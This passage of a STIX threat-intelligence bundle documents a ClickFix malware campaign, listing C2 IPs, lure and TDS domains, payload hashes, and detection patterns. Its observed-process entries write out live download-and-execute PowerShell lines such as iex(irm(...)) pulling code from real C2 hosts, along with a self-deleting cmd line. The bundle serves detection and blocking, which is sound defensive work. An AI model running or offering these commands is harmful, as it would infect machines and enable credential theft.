      "infrastructure_types": [
        "phishing"
      ],
      "labels": [
        "lure-domain",
        "crypto-lure",
        "political-lure",
        "svg-assets",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--937bb209-fd7c-481a-9c76-736cf14c8813",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "91.92.240.117 \u2014 Additional C2 IP",
      "description": "Stage-1 PowerShell download source in the Bryan affiliate chain (observed as powershell iex(irm('91.92.240.117'))). CC=BG, AS34368 per OTX telemetry. OTX sets a valid_until of 2026-06-17 on this IP; re-validate before relying on it for blocking after that date.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "ip",
        "c2",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--a8742037-1ec8-433c-a173-1666c3e92b71",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "91.92.240.121 \u2014 Additional C2 IP",
      "description": "Stage-2 download/Invoke-Expression source in the Bryan affiliate chain (observed as Invoke-WebRequest http://91.92.240.121; Invoke-Expression $result.Content, spawned by the 91.92.240.117 stage). CC=BG, AS34368 per OTX telemetry. OTX sets a valid_until of 2026-06-17 on this IP; re-validate before relying on it for blocking after that date.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "ip",
        "c2",
        "otx-enriched"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--adb73ef6-b188-4241-bd90-d2cb489a439b",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: captioto.com (TDS C2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'captioto.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "tds-c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8666c93b-ff7f-4b48-8ba1-eddc05fc7c4c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: cptoptious.com (TDS C2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'cptoptious.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "tds-c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2cb8094e-101a-4167-9105-e2c1cac4d872",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: newtdsone.shop (TDS C2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'newtdsone.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "tds-c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cdbf6a27-5d50-455a-a649-9cb700898b67",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: bryanexhaust.com (Associated domain)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'bryanexhaust.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "associated-domain"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4371eacf-7fc2-41ca-9b13-293eae43f5b1",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: gettrumpmemestrendingtokens.com (Crypto/political lure)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'gettrumpmemestrendingtokens.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "cryptopolitical-lure"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c82abcfd-8000-45b3-80f0-04ae65ed2843",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "IP: 91.92.240.117 \u2014 Additional C2",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '91.92.240.117']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "ip",
        "c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e9919288-46a7-4694-8487-cef5abc5be38",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "IP: 91.92.240.121 \u2014 Additional C2",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '91.92.240.121']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "ip",
        "c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7217d17c-3685-4973-a493-b5d4f3f921e9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "URLs: DonutLoader C2 payload paths \u2014 158.94.208.104/x7GkP2mQ9zL4/",
      "description": "DonutLoader C2 payload staging paths. Six payload variants observed: my_downloader.bin, my_l.bin, my_s.bin (likely main/loader/shellcode), student_downloader.bin, student_l.bin, student_s.bin. Naming convention suggests affiliate segmentation ('my' vs 'student' campaigns).",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[url:value MATCHES '^http://158\\.94\\.208\\.104/x7GkP2mQ9zL4/']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "donutloader",
        "c2-path",
        "payload",
        "bin",
        "affiliate-segmentation"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4f2242e3-e91c-4126-89cc-7dafd3d61804",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File hashes: OTX-enriched payload samples (5 SHA256 / 3 MD5)",
      "description": "Additional payload file hashes from OTX telemetry. MD5: 51b46342163ef37f5f41c269ffb337d3, 7c268bfab0653cdca45b4dc3c1ee0092, c43c4bfd2e1a44ef690e6801be2b4099. Stage attribution per the OTX indicator descriptions in this bundle: 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 is tagged compromised_site_redirector_fromcharcode (a JS redirector, not a binary payload); 4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5 / c43c4bfd2e1a44ef690e6801be2b4099 were collected from bryanexhaust.com. The stage of the remaining hashes is not established; they should not be assumed to be the .bin payloads from the DonutLoader C2 path without sample analysis.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.'SHA-256' = '2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810' OR file:hashes.'SHA-256' = '2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896' OR file:hashes.'SHA-256' = '6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d' OR file:hashes.'SHA-256' = '88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9' OR file:hashes.'SHA-256' = '4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "file-hash",
        "payload",
        "otx-enriched",
        "donutloader"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--63c4cfc2-e5eb-4948-bece-eb46e4df89e7",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "abstract": "DonutLoader payload naming suggests affiliate segmentation",
      "content": "DonutLoader C2 at 158.94.208.104/x7GkP2mQ9zL4/ hosts six payload variants with two distinct naming prefixes: 'my_' and 'student_'. Each prefix has three variants: _downloader.bin (stager), _l.bin (likely loader), _s.bin (likely shellcode/payload). This strongly supports the affiliate-market hypothesis: different payload sets served to different affiliates or campaign segments. The 'student' prefix may indicate a campaign targeting educational institutions or simply a second affiliate's payload set. Combined with the /jsrepo vs /teamrepo endpoint split and the sdntds.shop domain addition in V2, the infrastructure consistently shows multi-tenant design patterns consistent with a ClickFix-as-a-Service affiliate platform rather than a solo operator.\n\nAdditional domains from OTX (captioto.com, cptoptious.com, newtdsone.shop) confirm the cluster operates a larger TDS domain pool than the three domains visible in the analyzed JS samples alone \u2014 further evidence of platform-scale infrastructure.",
      "object_refs": [
        "indicator--7217d17c-3685-4973-a493-b5d4f3f921e9"
      ]
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--590a76b0-7501-4381-aa13-d17cdc284f78",
      "pid": 7408,
      "name": "powershell.exe",
      "command_line": "Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null",
      "is_hidden": false,
      "extensions": {
        "windows-process-ext": {
          "integrity_level": "Medium"
        }
      }
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--871eceb3-7924-47a2-8a21-ea6150efb5a2",
      "pid": 4908,
      "name": "powershell.exe",
      "command_line": "Invoke-WebRequest http://158.94.208.92; Invoke-Expression $checkResult.Content",
      "is_hidden": false,
      "parent_ref": "process--590a76b0-7501-4381-aa13-d17cdc284f78"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--53c85b31-f98a-45c6-b662-18fb9f681f21",
      "pid": 7556,
      "name": "csc.exe",
      "command_line": "csc.exe /t:library /out:%TEMP%\\tr0oowwq.dll %TEMP%\\tr0oowwq.cmdline",
      "is_hidden": false,
      "parent_ref": "process--871eceb3-7924-47a2-8a21-ea6150efb5a2"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--941cb6b8-04d8-476f-af10-e77c57f01ca7",
      "name": "svchost.exe",
      "command_line": "svchost.exe [injected \u2014 TR/Rozena.Gen via WriteProcessMemory+CreateRemoteThread]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--9da22fa6-69c4-47a2-a294-83358ef5f9d2",
      "name": "chrome.exe",
      "command_line": "chrome.exe [injected \u2014 credential harvester via WriteProcessMemory+CreateRemoteThread]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--4bea18b3-b9a3-4879-a036-41db052de2f4",
      "name": "cmd.exe",
      "command_line": "cmd.exe /C ping 1.0.0.1 & del svchost.exe",
      "is_hidden": false,
      "parent_ref": "process--941cb6b8-04d8-476f-af10-e77c57f01ca7"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--ca931dad-6efe-4553-b058-0e7d47f62033",
      "name": "wscript.exe",
      "command_line": "wscript.exe payload.js",
      "is_hidden": false
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--5e0af509-82c1-44bd-9281-3dd3e034a870",
      "name": "rundll32.exe",
      "command_line": "rundll32.exe shell32.dll,ShellExec_RunDLL",
      "is_hidden": false,
      "parent_ref": "process--ca931dad-6efe-4553-b058-0e7d47f62033"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--e7dee33f-2980-490d-8621-e1802e0e2586",
      "name": "powershell.exe",
      "command_line": "powershell.exe -EncodedCommand [Base64: downloads python312x64.zip from filemail.com]",
      "is_hidden": false,
      "parent_ref": "process--5e0af509-82c1-44bd-9281-3dd3e034a870"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--6a0b801c-9236-4b48-991f-6ff40fbe8827",
      "name": "pythonw.exe",
      "command_line": "pythonw.exe Protected.py",
      "is_hidden": true,
      "parent_ref": "process--e7dee33f-2980-490d-8621-e1802e0e2586"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--7ce8c822-5f65-44f0-a207-9aad138f1420",
      "pid": 1752,
      "name": "wab.exe",
      "command_line": "wab.exe [injected \u2014 Protected.py via NtMapViewOfSection+NtSetContextThread]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--742ba999-1e41-4f52-b169-c5ad60196d94",
      "pid": 3152,
      "name": "wab.exe",
      "command_line": "wab.exe [injected \u2014 Protected.py instance 2]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--5cfccef0-7fc4-4f70-b616-268c774f0b73",
      "pid": 5032,
      "name": "wab.exe",
      "command_line": "wab.exe [injected \u2014 Protected.py instance 3]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--23f1d410-05b7-43f1-985b-6700240707c1",
      "name": "powershell.exe",
      "command_line": "SyncAppvPublishingServer.vbs [LOLBin \u2192 hidden powershell.exe \u2192 pythonw.exe Protected.py]",
      "is_hidden": true,
      "parent_ref": "process--ca931dad-6efe-4553-b058-0e7d47f62033"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--ff773823-abbd-4b42-b33f-0302f37dae1f",
      "name": "powershell.exe",
      "command_line": "powershell iex(irm('91.92.240.117'))",
      "is_hidden": false
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--cf2b9712-adf4-4636-82c1-fd62dc53f765",
      "name": "powershell.exe",
      "command_line": "powershell Invoke-WebRequest http://91.92.240.121; Invoke-Expression $result.Content",
      "is_hidden": false,
      "parent_ref": "process--ff773823-abbd-4b42-b33f-0302f37dae1f"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--b12d60ee-5fa0-4c08-adb8-09585ed2ee5e",
      "name": "csc.exe",
      "command_line": "csc.exe /t:library /out:%TEMP%\\dwqlmpkj.dll %TEMP%\\dwqlmpkj.cmdline",
      "is_hidden": false,
      "parent_ref": "process--cf2b9712-adf4-4636-82c1-fd62dc53f765"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8",
      "name": "svchost.exe",
      "command_line": "svchost.exe [injected \u2014 dwqlmpkj.dll via DonutLoader, fetches student_s.bin + student_l.bin]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--3dbfa4a7-5ecf-417d-87da-296c9372c50a",
      "name": "chrome.exe",
      "command_line": "chrome.exe [injected \u2014 Chrome cookies/history harvest]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--1eb06df6-4b5f-41b2-8a7e-cb36626b0d99",
      "name": "cmd.exe",
      "command_line": "cmd.exe /C ping 1.0.0.1 & del svchost.exe",
      "is_hidden": false,
      "parent_ref": "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--39edc8f7-94a9-4072-aeb7-ee6500fe63fb",
      "name": "tr0oowwq.dll",
      "parent_directory_ref": "directory--c69d1bcb-c134-48e2-9fbe-72059d8a17a4",
      "extensions": {
        "windows-pebinary-ext": {
          "file_header_hashes": {}
        }
      }
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--a87058b1-11de-4028-92c6-1b6f7517cd24",
      "name": "tr0oowwq.cmdline"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--617572d2-0242-4370-8302-10d0cb8c4e19",
      "name": "dwqlmpkj.dll",
      "extensions": {
        "windows-pebinary-ext": {
          "file_header_hashes": {}
        }
      }
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--31d516ff-33a0-4474-b293-2ab9503130cc",
      "name": "dwqlmpkj.cmdline"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--5deb91ed-e003-451b-9a79-df8eb36bbd65",
      "name": "student_s.bin"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--f050a904-eb91-4728-83f8-cf90e2fd5bef",
      "name": "student_l.bin"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--61e3fe1d-c51f-4a53-a10e-ac0c3685aae5",
      "name": "Protected.py"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--7d255c91-1fff-4502-ab8e-fb1c90ad414b",
      "name": "python312x64.zip"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--8411a84c-7d3b-4d69-9ab9-dfec21df8348",
      "name": "wc*.tmp",
      "extensions": {
        "windows-pebinary-ext": {
          "file_header_hashes": {}
        }
      }
    },
    {
      "type": "ipv4-addr",
      "spec_version": "2.1",
      "id": "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
      "value": "158.94.208.104"
    },
    {
      "type": "network-traffic",
      "spec_version": "2.1",
      "id": "network-traffic--ca16c5f4-e143-4e8c-a372-f459bc36ebda",
      "dst_ref": "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
      "dst_port": 80,
      "protocols": [
        "http"
      ],
      "extensions": {
        "http-request-ext": {
          "request_method": "GET",
          "request_value": "/x7GkP2mQ9zL4/student_s.bin"
        }
      }
    },
    {
      "type": "network-traffic",
      "spec_version": "2.1",
      "id": "network-traffic--5e0c013a-a09f-4f65-9868-69fcf0481b34",
      "dst_ref": "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
      "dst_port": 80,
      "protocols": [
        "http"
      ],
      "extensions": {
        "http-request-ext": {
          "request_method": "GET",
          "request_value": "/x7GkP2mQ9zL4/student_l.bin"
        }
      }
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--d255af9b-affa-4662-9628-876708c3b978",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--590a76b0-7501-4381-aa13-d17cdc284f78",
        "process--871eceb3-7924-47a2-8a21-ea6150efb5a2",
        "process--53c85b31-f98a-45c6-b662-18fb9f681f21"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--fd5bf982-8ece-476e-b129-077419443782",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--941cb6b8-04d8-476f-af10-e77c57f01ca7",
        "process--9da22fa6-69c4-47a2-a294-83358ef5f9d2",
        "process--4bea18b3-b9a3-4879-a036-41db052de2f4"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--1d95e8a8-fc3f-47a5-ba88-078910037938",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--ca931dad-6efe-4553-b058-0e7d47f62033",
        "process--5e0af509-82c1-44bd-9281-3dd3e034a870",
        "process--e7dee33f-2980-490d-8621-e1802e0e2586",
        "process--6a0b801c-9236-4b48-991f-6ff40fbe8827"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--69ee0923-f4ca-4b22-8663-6e53c9b15216",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--7ce8c822-5f65-44f0-a207-9aad138f1420",
        "process--742ba999-1e41-4f52-b169-c5ad60196d94",
        "process--5cfccef0-7fc4-4f70-b616-268c774f0b73"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--1e400f18-0cd6-4cf0-a76f-05f936a642c3",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--ff773823-abbd-4b42-b33f-0302f37dae1f",
        "process--cf2b9712-adf4-4636-82c1-fd62dc53f765",
        "process--b12d60ee-5fa0-4c08-adb8-09585ed2ee5e"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--c327e1b9-886b-441e-94d4-65e271054712",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8",
        "process--3dbfa4a7-5ecf-417d-87da-296c9372c50a",
        "process--1eb06df6-4b5f-41b2-8a7e-cb36626b0d99"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--e6872478-9b30-4081-bb40-f67f3637cf87",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
        "network-traffic--ca16c5f4-e143-4e8c-a372-f459bc36ebda",
        "network-traffic--5e0c013a-a09f-4f65-9868-69fcf0481b34"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--0a7c3c5d-7138-48c4-ab9f-66964b20ab5a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "file--617572d2-0242-4370-8302-10d0cb8c4e19",
        "file--31d516ff-33a0-4474-b293-2ab9503130cc",
        "file--5deb91ed-e003-451b-9a79-df8eb36bbd65",
        "file--f050a904-eb91-4728-83f8-cf90e2fd5bef"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--db49abef-8b91-42de-843f-bc622cc241c1",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "file--39edc8f7-94a9-4072-aeb7-ee6500fe63fb",
        "file--a87058b1-11de-4028-92c6-1b6f7517cd24",
        "file--61e3fe1d-c51f-4a53-a10e-ac0c3685aae5",
        "file--7d255c91-1fff-4502-ab8e-fb1c90ad414b",
        "file--8411a84c-7d3b-4d69-9ab9-dfec21df8348"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4ad3bb0b-98e6-4b68-8940-60b50e15d410",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File: dwqlmpkj.dll / dwqlmpkj.cmdline \u2014 Bryan campaign Rozena DLL",
      "description": "Randomized DLL name compiled by csc.exe in the Bryan campaign. Equivalent of tr0oowwq.dll in the V1 chain. Confirms that the DLL name is randomized per campaign.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'dwqlmpkj.dll' OR file:name = 'dwqlmpkj.cmdline']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "rozena",
        "csc-compiled",
        "bryan-campaign",
        "randomized-dll"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7f56fc75-17b4-463c-8d51-6cea59fb9c67",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "PS command: iex(irm('91.92.240.117')) \u2014 Bryan campaign stage 1",
      "description": "Bryan campaign PowerShell stage 1. Uses 91.92.240.117 instead of 178.16.52.232. A different C2 per affiliate/campaign confirms multi-tenant infrastructure.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[process:command_line MATCHES 'iex.*irm.*91\\.92\\.240\\.117']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "powershell",
        "stage1",
        "bryan-campaign",
        "91.92.240.117"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--17945ceb-5351-4271-b5fb-0dc1262db963",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Behaviour: URL filter \u2014 skip .php/.txt/sitemap.xml/robots.txt (Bryan loader variant)",
      "description": "Bryan chain loader checks window.location.href against /\\.php|\\.txt|sitemap.*\\.xml|robots\\.txt/i before firing the XHR. This avoids triggering on admin pages, sitemaps and bot requests. Not present in the V1 loader \u2014 added between the V1 and Bryan builds.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '\\.php|\\.txt|sitemap.*\\.xml|robots\\.txt']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "url-filter",
        "evasion",
        "bot-avoidance",
        "bryan-variant"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ebb46384-b61d-4ae1-8e2a-aafa6ff724b4",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Behaviour: Dual cache-buster Math.random() + Date.now() (Bryan loader)",
      "description": "Bryan loader appends both Math.random() AND Date.now() to the TDS URL for cache-busting; V1/V3/V4 use Math.random() only. This gives a stronger cache bypass.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[url:value MATCHES 'teamrepo\\?rnd=.*&ts=']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "cache-buster",
        "date-now",
        "bryan-variant",
        "tds-evasion"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0c18e504-9a50-4da5-8acc-e954c9224b94",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Behaviour: navigator.userAgent fingerprinting in loader (Bryan variant)",
      "description": "Bryan loader reads navigator.userAgent before firing the TDS XHR. Likely used to filter out non-browser/bot requests or to target specific UA patterns.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES 'navigator\\[userAgent\\]|navigator\\.userAgent']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "useragent-fingerprint",
        "browser-filter",
        "bryan-variant"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fce050a1-6f2e-4d5a-9168-a77515118121",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File access: Firefox places.sqlite \u2014 Bryan chain credential theft",
      "description": "Bryan chain accesses Firefox places.sqlite (browsing history + bookmarks DB). The original V1 chain targeted Firefox key4.db (password store). places.sqlite is a different Firefox artifact yielding different data \u2014 browsing history and bookmarks rather than stored passwords.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'places.sqlite']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "firefox",
        "places.sqlite",
        "credential-theft",
        "bryan-campaign"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "ClickFix PowerShell Dropper \u2014 Bryan Campaign (91.92.240.117/121)",
      "description": "Bryan campaign variant of the ClickFix PowerShell dropper. Served by sdntds.shop/teamrepo (V2 TDS endpoint). Stage 1: iex(irm('91.92.240.117')) \u2014 different C2 from V1 (178.16.52.232). Stage 2: IWR 91.92.240.121 \u2014 different C2 from V1 (158.94.208.92). Compiles dwqlmpkj.dll (vs tr0oowwq.dll in V1 \u2014 randomized name per campaign). DonutLoader fetches student_s.bin + student_l.bin (affiliate 'student' segment). Credentials: Chrome cookies/history + Firefox places.sqlite (vs key4.db in V1). No parallel Python/wab.exe chain documented in this variant. Distinct C2s confirm per-affiliate infrastructure assignment.",
      "malware_types": [
        "dropper",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "clickfix",
        "powershell",
        "bryan-campaign",
        "91.92.240.117",
        "student-segment"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "powershell"
      ],
      "capabilities": [
        "remote-code-execution",
        "process-injection",
        "credential-theft",
        "self-deletion"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--6602261d-b993-479b-9fc1-d15e082d751a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "SL-ADV-007-BRYAN: bryanexhaust.com affiliate campaign",
